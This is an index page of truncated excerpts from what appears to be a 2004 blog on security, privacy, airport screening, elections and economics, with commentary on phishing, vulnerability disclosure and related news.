A SOUTH Korean woman paralysed for 20 years is walking again after scientists say they repaired her damaged spine using stem cells derived from umbilical cord blood. Hwang Mi-Soon, 37, had been bedridden since damaging her back in an accident two decades ago. Last week her eyes glistened with tears as she walked again with […]

 

Wikinews

SteveC, whose comments are broken, says: “wikinews is demoing here. When you have a hammer, everything looks like a nail. I can’t wait for wiki… wiki… wikigovernment. Or something. We could all edit the laws. yay!” Me, I want WikiAirlineSchedules.

 

CIA funded overthrows?

Cryptome points to a fascinating article in The Guardian about how the US is training young activists to undermine corrupt regimes: Funded and organised by the US government, deploying US consultancies, pollsters, diplomats, the two big American parties and US non-government organisations, the campaign was first used in Europe in Belgrade in 2000 to beat […]

 

Bad Security = Bad UI?

Allan Schiffman has sorted through the papers from the DIMACS Workshop on Usable Privacy and Security Software, and has summaries and recommendations in “Bad Security = Bad UI?.” [Update: Oh, the irony of a conference on usability naming all their files things like “blaze.pdf” or “garfinkel.ppt”– how about “blaze-usable-privsec.pdf,” so I can easily archive the […]

 

Music economics

Naxos is a classical music company. They bill themselves as the world’s leading classical label. They have a fascinating business model, which is that they find great ensembles, often in eastern Europe, have them record interesting music, and then sell it cheaply. I’ll often buy 2 or 3 Naxos CDs as experimentation. When they’re 7 […]

 

Containment?

America’s Secret War, by George Friedman, is reviewed in the Australian: The Americans had established and then strengthened a military presence in countries surrounding Saudi Arabia – Yemen, Oman, Qatar, Bahrain and Kuwait. Invasion of Iraq would complete the encirclement. “From a purely military view,” Friedman adds, “Iraq is the most strategic single country in […]

 

New look

For Yushchenko, and fair elections. It’s a small thing, but show your support. Turn your blog orange.

 

The revolutions are being blogged

From Iraq, the start of a new political party, and the jitters that come from living under totalitarianism. From Ukraine, people continue to rally and demonstrate against the hijacking of their democracy: The past four days have taught me something valuable: when I’m watching the situation unfold on television, I grow tense, fearful that it’s […]

 

Bush & Putin

Will President George W. Bush now stand up to Russia’s blatant imperial overreach in Ukraine? Will Mr. Bush protect America’s interest in the spread of democracy and free markets? While the President has touted good relations with his Russian counterpart, it is clear that Vladimir Putin financed and actively campaigned on behalf of an authoritarian […]

 

Evidence based…cooking

The curiosity that fueled the experiments in Mr. McGee’s first book is undiminished after 20 years, and his approach to cooking is still skeptical. He tries to take as little as possible for granted, asking at each step: Why am I doing this? Is there a better way? All this questioning has yielded conclusions, some […]

 

The democracy meme

“I will not accept the results of the presidential election until it is proved to me and the Ukrainian people that they are legitimate and credible in accordance with conditions set down by the constitution,” [Yanukovych] said in a statement. “I need no fictitious victory, a result which could lead to violence and victims. No […]

 

A market for journal articles, again

George Akerlof shared the 2001 Nobel prize in economics for his paper on “Lemon markets.” While reading Akerlof’s Nobel Prize essay, I was struck by the comment: I submitted “Lemons” there, which was again rejected on the grounds that the The Review did not publish papers on topics of such triviality. It seems to me […]

 

A lemons market for … anti-spyware

Anti-spyware software has many of the issues that other privacy software has had.* It’s hard to understand the technical means by which privacy is invaded. It’s hard to see that you have (some) spyware. And it’s hard to evaluate what anti-spyware software works, and what doesn’t. Well, it was. Eric Howes has started testing anti-spyware, […]

 

Travel Plans: Shmoocon

Crispin Cowan and I will be running a BOF at Shmoocon, on Evidence Based Security. Shmoocon is in DC, Feb 4-6 of next year.

 

NYT on TSA

These women and a good many others, both frequent and occasional travelers, say they are furious about recent changes in airport security that have increased both the number and the intensity of pat-downs at the nation’s 450 commercial airports. And they are not keeping quiet. … Most of the women interviewed said they did not […]

 

No fly list

A man with an expired passport got onto Air France flight 26 on Saturday, November 19th: Flight 026 from Paris to Washington Dulles International Airport was diverted to Bangor, Maine, after U.S. officials discovered that the man was listed on the government’s no-fly list. The man’s name also was on the State Department’s terrorist watch […]

 

Security and diplomacy

…Mr. Bush had to wade into a group of security agents to pull his lead Secret Service agent out of a shoving match with the Chilean police. The tape showing the president assuring the Chileans that his agent could come with him played over and over on television screens in the region this weekend. By […]

 

What I'd like from a social software web site

There are lots of so-called ‘social software’ web sites that help you umm stay in touch with friends, or make new ones or something (Friendster, Tribe, Orkut, etc). Some are more socially oriented, others are more about business. What I’d really like is one that supports my travel habits. I fly to lots of places. […]

 

Informed? comment

Experts tend to know that when journalists report on their subject, things get twisted up and wrong. You start to evaluate a publication by looking at how it does on subjects you know, and assume that its work is consistently at the same level. I’ve been (cautiously) reading Informed Comment, by Juan Cole. He tends […]

 

What's Google Worth?

I opened this blog, exactly three months and 250 posts ago, asking, “Why Did Google Pop?” (with a second post on the topic as well.) Nudecybot has two fascinating posts on Google today. The first is on Google bias, the second on gmail, and the fact that it now actually secures your email (way to […]

 

So who likes them?

Ryan Singel catches an AP article on RFID passports: On the latest passports, the agency has “taken a ‘keep it simple’ approach, which, unfortunately, really disregards a basic privacy approach and leaves out the basic security methods we would have expected to have been incorporated for the security of the documents,” said Neville Pattinson, an […]

 

Cost, Value of government

After the election, I asked “What’s a Free Election worth?” John Robb over at Global Guerrillas has a partial answer, which is what the 2nd intifada has cost both sides over 4 years: 10% of Israel’s GDP (roughly 2.5% of GDP per year), and a stunning 300% of GDP over 4 years for the Palestinians. […]

 

Phishing

There’s a 3 page article in the Washington Post on phishing, the use of fake email and web sites to capture usernames and passwords. The phishers often target financial institutions. Marcus Sachs, a former White House cyber-security adviser and current director of the SANS Internet Storm Center, said marketing departments at many banks do not […]

 

Deworming the Internet

The always engaging Doug Barnes has a new paper out, “Deworming the Internet.” The paper is more interesting because Doug is technically and legally savvy. (Always a dangerous combination.) The paper evaluates regulations, markets, government intervention, litigation, and finally, a set of suggestions for what is most likely to work. It’s perhaps the most comprehensive […]

 

Secretly admired blogs

Discovered a bunch of friends’ blogs today: You Must Be Present to Win (Doug Barnes), Creative Destruction (Sameer), Evil Geniuses For A Better Tomorrow (Jim McCoy, from whom I stole the “Most Evil Genius” gag title I used while at Zero-Knowledge).

 

Stolen EFF docs at WIPO negotiations

The EFF is doing a great job trying to prevent bad law from being created at a global level. There’s a bizarre story of EFF docs being stolen and trashed to prevent their message getting out. Cory writes: We ended up posting a guard over the table — thanks to Rufus Pollock from the Campaign […]

 

Big mother is watching

Great cartoon at Ok/Cancel. [Update: The image doesn’t fit on a lot of browsers with my CSS, so it’s now just a link.]

 

Security & Outsourcing

[Inland Revenue] learned a lesson after one incident, during the previous EDS contract, when its security department found out about cost-saving plans to shut a data centre and move sensitive information to a shared site only after an internal memo was circulated. Computing has a good basic article on security issues in outsourcing of IT […]

 

A Market for Journal Articles?

In A Market for Journal Articles, Alex Tabarrok refers to a paper by David Zetland on A Market for journal articles. Zetland suggests that journal publishers should buy manuscripts in an auction. You probably already have some objections: Where would the money come from? Why would journal editors buy what they can get for free? […]

 

The height of logic

“The question was, why do I support a strong dollar policy? The answer is because it is our policy,” [US Treasury secretary John] Snow said. “Our dollar policy remains unchanged because a strong dollar is in both the national and international interest.” He pledged to curb the US massive budget deficit – but said the […]

 

TSA's identity obsession

US Homeland Security undersecretary Asa Hutchinson said the current practice of airlines giving the names of passengers to US officials 15 minutes after take-off did not make sense. … “If we have to have information 60 or 45 minutes before, you’ve got to close off the passengers that come in at the last second,” he […]

 

Glad to be a perfect straight man

In his response to my comments on vulnerability hunting, Pete Lindstrom discusses four ways to make things better: (1) Legislate/enforce the law; (2) Buy exploits now and then; (3) Create software security data sheets; (4) More honeypots. I don’t think that (1) actually helps. More laws against finding vulns makes life harder for the good guys, by moving information […]

 

TSA ignores the public

As I and others predicted, the TSA has chosen to run roughshod over our concerns. Interestingly, they claim that we have implicitly consented to the data being used this way. That’s interesting, because in the comments which I sent to them, I explicitly stated that I don’t consent. (Search this document for the words “do […]

 

Blog changes

Thanks to Dave and Lisa, I’ve moved to a new host. Things may have unsettled during the move. We’ve also added a feature that closes comments after a bit, because old posts are getting nothing but blogspam.

 

A downside to data warehousing

A long story in the New York Times ends: Still, as Wal-Mart recently discovered, there can be such a thing as too much information. Six women brought a sex-discrimination lawsuit against the company in 2001 that was broadened this year to a class of about 1.6 million current and former female employees. Lawyers for the […]

 

How not to find vulnerabilities (2)

Pete Lindstrom has argued that we need to end the bug-hunt: Once evaluated, neither reason provides a good foundation for continuing the practice of vulnerability seeking, but it gets much worse when we consider the consequences. There is a rarely mentioned upside to all this bugfinding, which is that researchers use the exploit code to […]

 

How not to report vulnerabilities

This week Finjan announced that it has told Microsoft of 3, or 10, or maybe 19 issues with SP2. Robert Lemos at CNET writes: “We don’t want to argue with Microsoft about these things,” he said. “We found the 19 vulnerabilities, and we showed that you could take remote control of a computer.” However, Microsoft’s […]

 

Kaspersky Labs switches to a new naming scheme

Kaspersky Labs makes some of the best anti-virus software out there, as analyzed by the Virus Test Center at the University of Hamburg. They recently announced a new naming scheme. I’ve been thinking a lot about naming schemes recently, and I think this one could be better. Let me take it apart, and explain why. […]

 

"An abundance of caution"

Hundreds of passengers were evacuated briefly Thursday from the main terminal at Dulles International Airport outside Washington after airport screeners thought a suspicious image on an X-ray monitor might be a gun. Screeners spotted the image about 4:40 p.m. EST Thursday and the terminal reopened about an hour later. Passengers went through security checkpoints again, […]

 

Mac 10.3.6

Macworld excerpts a very detailed analysis of the MacOS 10.3.6 update. It’s too bad that Apple chooses to give us a 22 item change description when they’ve changed upwards of 1,000 files.

 

Two on Risk

There’s a nice interview with Kathleen Hagerty over at CSO. She’s a finance professor, talking about risk. (Speaking of business school professors, work by Martin Loeb and Lawrence Gordon on the Economics of Information security investment is outstanding, and unfortunately, not online as an html or pdf file.) Second, I just got around to reading […]

 

WTO, Bastion of liberty?

Antigua and Barbuda have won a case at the World Trade Organization, claiming that US laws against internet gambling are a violation of the WTO rules.

 

More on 700 Arrests

Yesterday, I mentioned the 700 arrests [in the United States] in an attempt to deter terrorist activity. Also yesterday, several residents of The Hague violently objected when the police showed up to arrest them. This is a pattern in the arrest of Al Qaeda suspects: Some of them decide that shooting the police is the […]

 

DETER testbed

There’s a coalition of universities working on a security testbed, called DETER. It’s an excellent idea, and apparently, they’re up and running. I look forward to the output from the conference. I hope they’ll ensure that all papers are online and available to the public.

 

Rushed Security

Samablog, irked that Rush has stolen his joke, explains that you can get at all of Rush’s $7 a month content, just by turning off all the scripting stuff in your browser. He then goes on to say: “What it says that a celebrity of Limbaugh’s stature keeps his site so insecure, I don’t know.” […]

 

9th Circuit limits police privacy

The chief warned Anthony Johnson to point his video camera elsewhere, then wrestled the camera away and put Johnson in jail for recording communication without permission, court records say. … A 9th Circuit U.S. Court of Appeals panel last week reinstated Johnson’s suit, which had been thrown out by a federal magistrate in Tacoma, and […]

 

Easier to get forgiveness than permission

So when will the public be able to easily and cheaply adopt useful security technologies that cost next to nothing? Asks Nudecybot. And the answer is…NOW! Why wait? Generate some keys and use them!

 

"Better Than Nothing Security"

Eric Rescorla has a great post reporting from the IETF on the “Better Than Nothing Security BOF.” As I see it, this boils down to an understanding that paying for digital signatures is very expensive, while we’ve known for ten years that “keys are cheap.” (Thanks, Eric!) The SSH folks got this very right: You […]

 

Vonage, FCC

U.S. regulators ruled Tuesday that providers of Internet-based phone call services fall under the jurisdiction of the federal government and cannot be regulated by states. … Vonage has been battling public utilities officials in Minnesota who want the company to register in the state as a telecommunications service, subjecting it to rate regulation and other […]

 

Garbage In…

There’s a post over at BoingBoing, laughing at some poor software transcription of Jabberwocky. Hello? What do you expect? The poem is full of nonsense words. If my speech recognition program started putting brillig and slithy toves in my text, I’d be pissed off. So of course it gets this wrong. C’mon, folks, you want […]

 

NC Voting Issues Could Lead To Special Election

“The bottom line that we have heard from the manufacturer is that these votes are not missing. They’re lost,” county commissioner-elect Tom Steepy said. “It’s very disheartening. It really is.” Damn right it is. Voting machines should produce paper ballots, or their CEOs should offer to commit seppuku over any failures. (From WRAL.com Carteret Voting […]

 

Chinese Flee Formal Banking

The friends often lend each other large amounts on the strength of a handshake and a handwritten i.o.u. Both sides then go to an automated teller machine or bank branch to transfer the money, which is then withdrawn from the bank. Or sometimes they do it the old-fashioned way: exchanging burlap sacks stuffed with cash. […]

 

700 arrests made to avert election terrorist attack

Jihad Watch points to an AP story: More than 700 people were arrested on immigration violations and thousands more subjected to FBI interviews in an intense government effort to avert a terrorist attack aimed at disrupting the election. As with past unrealized al Qaeda threats, law-enforcement officials said yesterday they don’t know for sure whether […]

 

Happy Berlin Wall Day!

We need more holidays that celebrate liberty. The fall of the Berlin Wall is as good a day as you can find. However, Wikipedia points out that: Some believe November 9 would have made a good German National Holiday, since November 9 is also the date of the declaration of the Weimar Republic in 1918. […]

 

Hamdan vs Rumsfeld

The only three facts that are necessary to my disposition of the petition for habeas corpus and of the cross-motion to dismiss are that Hamdan was captured in Afghanistan during hostilities after the 9/11 attacks, that he has asserted his entitlement to prisoner-of-war status under the Third Geneva Convention, and that the government has not […]

 

Richard Clarke says get over 'cyberterror'

Overuse of the term ‘cyber-terrorism’ is confusing board directors and preventing much needed investment in IT security, says former White House security advisor Richard Clarke. Now if we could just get rid of the term “cyber,” we’d be all set to have a mature discussion. (From VNUnet, via InfoSecNews.)

 

Computer Security and The Human Factor

Nudecybot has a thoughtful post on Computer security and the human factor. He takes a discussion we had, and organizes it well. He talks about airline safety vs computer safety, and how an anonymous reporting system has helped in the airline case. I think there are two bits that he misses that make the airline safety […]

 

Mac Trivia: Zero Byte resource error

You can probably skip this post. I wanted to blog it to help people with this problem solve it faster. It involves the Mac System update tool throwing up a dialog that says: A networking error has occurred: zero byte resource (-1014). Make sure you can connect to the Internet, then try again. [Update, 20 […]

 

Mac Trivia: Zero Byte resource error

You can probably skip this post. I wanted to blog it to help people with this problem solve it faster. It involves the Mac System update tool throwing up a dialog that says: A networking error has occurred: zero byte resource (-1014). Make sure you can connect to the Internet, then try again. I was […]

 

Corporate governance goals impossible (II)

Further quoting from that same article in the Register about the impact of new rules: Business managers becoming fed up with FUD In a separate study, more than a third of the 30 delegates to the Axis Action Forum admitted that their Board had never asked for an update on security or implications of security […]

 

New Software

Thanks to our industrious sysadmin, we have a new rev of MT in place. It’s much more aggressive about weeding comments, so what you say won’t show up instantly. If your real comment doesn’t show up, please drop me a note. And please, do leave comments. Even if it’s against your better judgement. (Yes, I’m […]

 

Al Qaeda's use of cryptography – scant evidence

Not too long ago, I gave a talk on privacy technology to the Atlanta chapter of the High Tech Crime Investigators Association. It was a talk that several of us at Zero-Knowledge had learned to give. The basic method for talking to police about privacy is to start from the need to reduce and prevent […]

 

"Good thing there's a monopoly"

“Unionized employees at the SAQ are launching a four day strike that will shut down Quebec liquor board stores for the weekend.” Says the Montreal CBC site. The SAQ is Quebec’s government owned liquor monopoly. Non-SAQ stores can sell only bad wine and some beer. (No, really, there’s a list of approved wines that others […]

 

More maps

Bigpicture has put up 11 map links, some of which are very cool. I really like the parallel maps of 2000 vs 2004. (If you use Safari, with its transparent drag, you can produce your own overlay maps!) I also like the county-by-county maps; they’re elegant. Not so good is the chartjunk map from the […]

 

Return Addresses

Canada Post has apparently told the world that they’ll only deliver mail with a return address. This is clearly silly; phone books are full of valid return addresses for your city. Over at StupidSecurity, nrh asks: Part of the reason I delayed was that I was trying to find out if this was even legal. […]

 

Obfuscated Voting Redux

No, not the elections, silly, the contest! And now the results are up, and it seems that Michal Zalewski is in the lead.

 

British Petition

There’s a petition to stop ID cards in the U.K. Alas, there’s nowhere for residents of Clark county, Ohio, to express opinions. (Via Steve at Fractalus.)

 

Microsoft pre-warning of patches

[Microsoft] will publish a general summary of planned security bulletin releases three business days before each regularly scheduled monthly bulletin release… The advance notifications will include the number of bulletins that might be released, the anticipated severity ratings, and the products that might be affected. This has been available to select customers for a while. […]

 

Morris Worm is Sweet 16

Sixteen years ago, the first worm spread across the Internet. It used password cracking, a buffer overflow in fingerd, and a flaw in sendmail to spread. At least today, sendmail seems more secure. Passwords and buffer overflows, check back in sixteen more.

 

Symposium on Usable Privacy and Security (CFP)

The Symposium on Usable Privacy and Security (SOUPS) will be held July 6-8, 2004 at Carnegie Mellon University in Pittsburgh, PA. This symposium will bring together an interdisciplinary group of researchers and practitioners in human computer interaction, security, and privacy. The program will feature refereed papers, tutorials, a poster session, panels and invited talks, and […]

 

"Stop … Hurting … America"

Sure, the Electoral college is mostly winner-take-all, but America isn’t. The “red/blue” divide nonsense on TV is all about polarizing the country. See the map bigger here. It’s like Jon Stewart said to the boys at Crossfire: Stop hurting America. (Via BoingBoing.)

 

No Right To Be Free of Airport Searches?

Ed Hasbrouck writes: For the first time ever, lawyers for the USA Transportation Security Administration (TSA) will appear in court tomorrow in Seattle to try to defend their (still largely secret) procedures for the compilation and use by the TSA, law enforcement agencies, and airlines of “No-Fly” and “selectee” watch lists. … I got word […]

 

Liberties Eroded

On three occasions over the past five months, Tubiana said, outside judges assigned to review the vendor’s case have set deadlines for investigating magistrates to either indict or release him. The deadlines have passed, but his client remains locked up, court documents show. “There is in fact no control” over these magistrates, he said. “They […]

 

Reliability and Security

However, Engler thinks the security explanation should be taken with a grain of salt. His research in the late 1990s aimed to improve the reliability of software. Security analysis was part of the story, he says, but “basically, we just didn’t want stuff to crash.” (writes Jon Udell in Infoworld.) But Crispin Cowan has a […]

 

What's a Free Election worth?

As we go into the 54th Presidential elections under the US Constitution, two things, possibly related, have struck me. The first is the elections in Afghanistan. Millions of people ignored threats and went out to vote. Millions of them were women, given a say in their country’s government for the first time. The other […]

 

"I am searching for the truth as long as I can"

I recently blogged about Ted Taylor, and the book he inspired. He passed away recently: Thirty-one years ago, The New Yorker published a profile of nuclear weapon designer Ted Taylor, written by John McPhee. Published in book form as “The Curve of Binding Energy,” this was the first time the prospect of nuclear terrorism was […]

 

Rehnquist's Health

The announcement suggests that Rehnquist is suffering from anaplastic thyroid cancer, a rare and aggressive form of the disease, said Herman Kattlove, an oncologist and medical editor for the American Cancer Society. The anaplastic variety is the only type of thyroid cancer that is treated with chemotherapy. “It’s not treatable by surgery, only by chemotherapy […]

 

Hello? Earth to Justice Dept…

The New York Times reports: Lawyers for many of the detainees, including the ones named in the Supreme Court ruling, say the Bush administration is purposely ignoring the justices’ mandate and stalling. They cite the government’s refusal to acknowledge that detainees are entitled to free access to lawyers to make their cases before federal judges. […]

 

Canadian Privacy Law again

Last week, I commented on Michael Geist’s column. In part 2, he took an excellent direction. He suggests not only economics, but a legal structure that forbids Canadian companies’ compliance with US orders. Read it.

 

Privacy Protectionism

This month the B.C. government passed a law to prevent the U.S. from examining information on British Columbians that is in possession of private U.S. companies. The CBC reports on information about Canadians being sent to the US for processing, and the attendant legal risks. In Canada, they have strong-sounding data-protection laws that they don’t […]

 

Paranoia is rampant

Neither, of course, is true. But these rumors testify to one of the most distinguishing — and disturbing — aspects about this election: Paranoia is rampant. “I haven’t seen an election in which more people are worried about what’s going to happen to them on Election Day,” said Herb Asher, an Ohio State University political […]

 

Ian Grigg on SSL

Ian Grigg has a great page on the SSL industry (really the “certification authority” industry). Worth reading. The topic reminds me of an essay, I think from Nick Szabo, on the use of language and terminology within the security industry to distort thinking. (The bit I remember discussed the use of “certification authorities,” self-declared.) I’m […]

 

Regulate that Arbitrage!

An update on the Americans Stream to Canada For Flu Shots story: In eight days 3,800 people have jumped on the ship and paid their $105. Victoria Clipper’s Managing Director said the company had not expected there would be such a massive take up. The company says the day trips still continue, but the number […]

 

Canadian Charter of Rights And Freedoms

So let me get this straight… Quebec Court Judge Danielle Cote handed down a 153-page ruling that found two sections of the federal Radiocommunication Act violate the Canadian Charter of Rights and Freedoms. … Cote extended a grace period of one year before her ruling would come into effect. So the law is a violation […]

 

Canadian Charter, II

It seems a bizarre right to be allowed to watch TV, but not say insensitive things. (It’s sad that the car dealer felt ok insulting customers and turning away business. It’s sadder that the courts are intervening where the right answer would be more speech, publicizing intolerance and shaming the dealer.)

 

Johnnie Thomas again

On one occasion [Johnnie Thomas] was told that she had graduated to the exalted status labeled, ‘Not allowed to fly.’ She discovered that there was no method available for having ‘her’ name removed from the DNFL; indeed, one person from her local FBI office dismissively told her to hire a lawyer (although ironically, he refused […]

 

Online Extortion

There’s a long article by Joseph Menn in the LATimes about online extortion via DDOS attacks, and how much money it brings in. (Use Bugmenot for a login.) The threat involved massive denial of service attacks on a gambling site, using thousands of “zombie” computers sending data to the site. It’s not clear how clever […]

 

Amazon (3 Comments on SteveC)

Something about a post by Steve got to me… Whenever amazon comes up in conversation I tell people how particularly behind they are but I don’t think I get the point across. Who does better? I find that it always works better to say who does well, rather than who does poorly. Let people figure […]

 

"Getting nothing wrong is for the uninspired"

Nat has a typically insightful post inspired by Muine, a radical re-think of what a music player on your computer should do. Why would those things be there? Because every other music app has those features, and if you’re building a music tool, you’ve got to have them too. Only, somehow, you’ve got to do […]

 

Bejtlich on Intrusion Data

Richard Bejtlich posts on “Will Compromises at Universities Aid Security Research?”: Several recent events may give security researchers the data they need. For example, UC Berkeley suffered an intrusion on 1 Aug 04 which jeopardized a database containing names, addresses, telephone and Social Security numbers collected by the California Department of Social Services (CDSS). According […]

 

Common Criteria

Statistics gleaned from the labs’ Common Criteria work indicate that the testing is improving security, said Jean Schaffer, director of NIAP. Schaffer spoke during a session at a Federal Information Assurance Conference held this week at the University of Maryland. So far, 100 percent of the products evaluated have been approved, she said. The testing […]

 

DHS Inspector Report

According to a new report from the Department of Homeland Security’s inspector general, airport screeners still Need Improvement. That will not come as a surprise to anyone who travels, but some of the details, as reported by A.P., are still disturbing: -Screeners aren’t tested on when they should pat down passengers and what the passengers’ […]

 

"Americans stream to Canada for flu shots"

With a US shortage caused by contaminated vaccine and flu season approaching, business has been brisk at Canadian clinics and doctors’ offices along the border from British Columbia to as far east as New Brunswick. A Canadian Internet pharmacy is working with a half-dozen physicians in Montreal to offer weekend flu-shot tours to New Yorkers. […]

 

Piscitello on Bugtraq

My frustration level with bug-traq increases in direct proportion to the frequency at which wannabes report vulnerabilities on software that has limited consumption and little business on a business network. I finally contacted some of the wannabes. I probed each for more specifics than the original bug disclosure: I think that Dave has a valid […]

 

Query Address Book.app

The Little Brother’s Database, an addressbook program, includes a tool, ABQuery, that allows you to look inside the Mac’s address book from the command line. (Via MacOSXHints.com.)

 

iPod, so?

Apple announced a new iPod that shows pictures. What I want to know is, where’s the 8-in-1 media reader to take photos directly from your camera?

 

Howard Stern vs. Michael Powell

Michael Powell was on the Ronn Owens show. 15 minutes into the show, Howard Stern calls in. Listen here. As Sama says, Stern is an unfortunate advocate for free speech. But it’s nice to hear someone directly challenge America’s censor. (Via BoingBoing.)

 

The Curve of Binding Energy

Is the story of Ted Taylor, one of the cleverest of the very clever men who designed nuclear bombs. He designed the largest bomb ever set off by the US, and the smallest. He once used a nuclear bomb to light a cigarette. And in the early 1970s, he was very concerned that terrorists could […]

 

Sixth Circuit Reverses Lexmark

One of the worst bits of law to come out of the Clinton years was the “Digital Millennium Copyright Act,” (DMCA). The law made it a crime to break any copy protection scheme, even if the data it was protecting was subject to some form of fair use. The law had lots of nasty chilling […]

 

Some explosives links

But the real issue is that the explosives can be used against civilians and soldiers in Iraq and around the world. Consider that only five grams of RDX, for example, is enough to kill a person when used in an anti-personnel land mine. When 1,000 pounds of explosives were set off by a suicide bomber […]

 

Mistakes, Incompetence, and Coverup Beyond Fevered Imaginings

Michael Froomkin has a long post on the 350 tons of stolen high explosives, which I’m excerpting at length: If all that matters is our safety and security, then today’s news makes it clear beyond peradventure that the Bush administration is horribly dangerous to our national security. Josh Marshall’s blog today runs an extensive quote […]

 

Marginal Revolution: Democracy: Theory and Practice

Steven Landsburg makes a very entertaining point about democracy: …It is worth observing that if you really believe in democracy, and if the election is close, then it doesn’t much matter who wins. The theory of democracy (stripped down to bare essentials, and omitting all sorts of caveats that I could list but won’t) is […]

 

The Security/Security Tradeoff

People trying to infringe our privacy often claim that they’re making a tradeoff between security and privacy. Sometimes they’re even right. But I think today, we’re trading security for “security,” giving up real protection for an illusion. For example, the TSA is spending lots of money to build and connect databases all about travelers. For […]

 

I wonder what this means?

I’m trying to submit my comments on Secure Flight. When I try to upload my file to http://dmses.dot.gov/submit/ProcessES.cfm, I’m told: An error occured while attempting to upload your comment [Microsoft][ODBC driver for Oracle][Oracle]ORA-01401: inserted value too large for column I’ve submitted a request for help via the provided link.

 

TSA Wastes More of Your Money

WASHINGTON — The Transportation Security Administration was lax in overseeing a $1.2 billion contract to install and maintain explosives-detection machines at U.S. airports, resulting in excess profit of about $49 million for Boeing Co., a Department of Homeland Security review found. (From a Wall St Journal article, October 19th. Sorry, subscriber-only link.)

 

Nielsen on Security

Jacob Nielsen has a very good analysis of security, followed by a not-so-great set of suggestions. He is spot on in saying that 1) it doesn’t work, 2) it puts the burden in the wrong place, and 3) this has nasty side effects. (I’d reverse 1 & 2, as the economics predict #1, but that’s […]

 

Mac "Virus"

There’s an alarmist headline at MacSlash about a new mac virus. It’s been picked up in a bunch of places. The commenters correctly identify it as a rootkit, not a virus. A rootkit is a program you install, after break in, to hide your tracks. It’s not even a sophisticated rootkit. It’s stunningly primitive. Reading […]

 

Organization in the way: how decentralization hobbles …

Another interesting article from Peter Merholz closes with: Until now, user experience efforts have been focused on building teams that practice user-centered design (UCD). However, researchers at User Interface Engineering recently discovered that the size of an organization’s UCD practice is somewhat inversely proportional to the site’s usability. You read that right: Companies that invest […]

 

"Metadata for the masses"

In “Metadata for the masses,” Peter Merholz presents an interesting idea, which is to build a classification scheme from free-form data that users apply. He points to Flickr’s “Cameraphone” category, which would probably not exist if there was only a pull-down list. He also points up problems: Many categories for one thing (nyc, NewYork, NewYorkCity), one […]

 

What a Great Review

NudeCybot sent me a link to an interesting looking book on “Sorting Things Out.” I found this review resonated with how I often feel reading academic work: This tragic book is full of important ideas and significant research, but it’s so poorly written you hardly notice. Other reviews kindly describe its style as “academic,” but […]

 

2-Fingerprint Border ID System Called Inadequate (washingtonpost.com)

Rep. Jim Turner (D-Tex.) wrote that a study by researchers at Stanford University concluded the two-finger system “is no more than 53 percent effective in matching fingerprints with poor image quality against the government’s biometric terrorist watch-list.” Turner said the system falls far short of keeping the country secure. It’s not clear to me why […]

 

Efficient Markets and Prediction

In a post below, I quoted my friend Craig commenting on the differences between election sites and the IEM. Steven Landsburg had previously commented privately that IEM together with TradeSports is inefficient. By playing one against the other you could make money on either likely outcome of the election. So, if these markets were efficient, […]

 

Security Signaling

Signaling is a term from the study of lemons markets. A lemons market is a market, such as in used cars, where one party (the seller) knows more than the buyer. There are good cars (peaches) and bad ones (lemons). The buyer is willing to pay a fair price, but can’t distinguish between the cars. […]

 

Notational Velocity

Andrew Stewart pointed me to Notational Velocity, an interesting little note taking app. It’s a little disconcerting at first, because you only have one note area, and the way to create a new note is to just overwrite the old title. (There’s a menu item to rename something.) But worth checking out if you’re a […]

 

"Television cameras captured the moment the Cuban leader fell"

Unfortunately, the BBC is simply reporting on him falling over, not on his 45 year dictatorship being toppled, the Cuban people gaining a measure of self-determination, or the freedom to speak one’s mind: A few blocks away, a 27-year-old man who didn’t want to give his real name, had some advice for the only president […]

 

Secondary Screening: JetBlue FOIAs

Ryan Singel has a long and worthwhile post at Secondary Screening on the JetBlue FOIAs. I have only one thing to add, which is that his closing line somewhat misses the mark: But this issue is not going away as there is at least one report coming out soon that will further complicate the debate […]

 

The Tree of Life, COI-ly

The September 30th issue of the Economist points to an article in PLoS Biology by Hebert, et al, discussing a new technique for identifying species. The technique relies on the mitochondrial gene for cytochrome c oxidase I (COI), which is a 648 base-pair gene. [1] This technique helps settle the question of “Is Astraptes fulgerator […]

 

So Cynical, I Wish I'd Thought of It.

My friend Craig Sauer wrote: In the spirit of the equal time, here’s what’s keeping me from being optimistic about Kerry’s chances: The Iowa Electronic Markets. You’ll have to read on the site to get the real skinny, but basically, the IEM is a real-money futures market where people make informed “bets” about who is […]

 

Hackers sabotage Waikato (NZ) food company

Computer hackers have emailed 3000 of the company’s customers, saying a company product – lamb chips – are being recalled due to an infectious agent, and the warning has since been posted on internet message boards. Sad as it is for Erik Arndt and Aria Farm that this has happened, I think this is interesting […]

 

"What your CEO thinks about security"

Larry Ponemon writes: Unfortunately, CEOs have persisted in focusing on four basic questions that too often stump the most savvy IT professionals: What is the security return on investment? What is the probability of a catastrophic security failure? What is the cost of self-insuring against security risks? What are the tangible benefits of being an […]

 

Neal Stephenson at /.

In order to set her straight, I had to let her know that the reason she’d never heard of me was because I was famous. … Mind you, much of the authority and seniority in that world is benevolent, or at least well-intentioned. If you are trying to become a writer by taking expensive classes […]

 

Powerpoint, usability

I’ve put slides and a pdf from a talk yesterday on my homepage. Making pdf is easy on the mac, making html less so. Since this is the web, I’d like to put up html of the slides, and I think that the HTML that PPT produces is poor. In particular, I’d like smaller files, […]

 

Must … extend … grasp!

Each aircraft operation … with a MTOW of more than 12,500 pounds, must conduct a search of the aircraft before departure and screen passengers, crew members and other persons, and all accessible property before boarding in accordance with security standards and procedures approved by TSA. … [Separately, charter aircraft run as clubs…] These clubs transport […]

 

Thoughts on SB 1386

Looking for a link to SB 1386, I noticed that of the first 10 Google hits, 2 are legislative, 2 are law firms, 3 are information security portals, and 3 are for security companies. Three of the security companies, (Verisign, Threatfocus and Watchfire) are simply adding “SB 1386” to existing products, and claiming to provide […]

 

1.4 Million Californians Exposed

A computer hacker accessed names and Social Security numbers of about 1.4 million Californians after breaking into a University of California, Berkeley, computer system in perhaps the worst attack of its kind ever suffered by the school, officials said Tuesday. (This is all over the web, I found a version at News.com.com.) A few questions […]

 

"I do not approve"

Alex Tabarrok writes: The headline in the Washington Post yesterday read “FDA Approves Artificial Heart for Those Awaiting Transplant.” The language annoys me – it sounds as if the FDA gave a Good Housekeeping Seal of Approval to the artificial heart. Consider how much clearer the tradeoffs of medical policy would be if instead the […]

 

Polite Technology

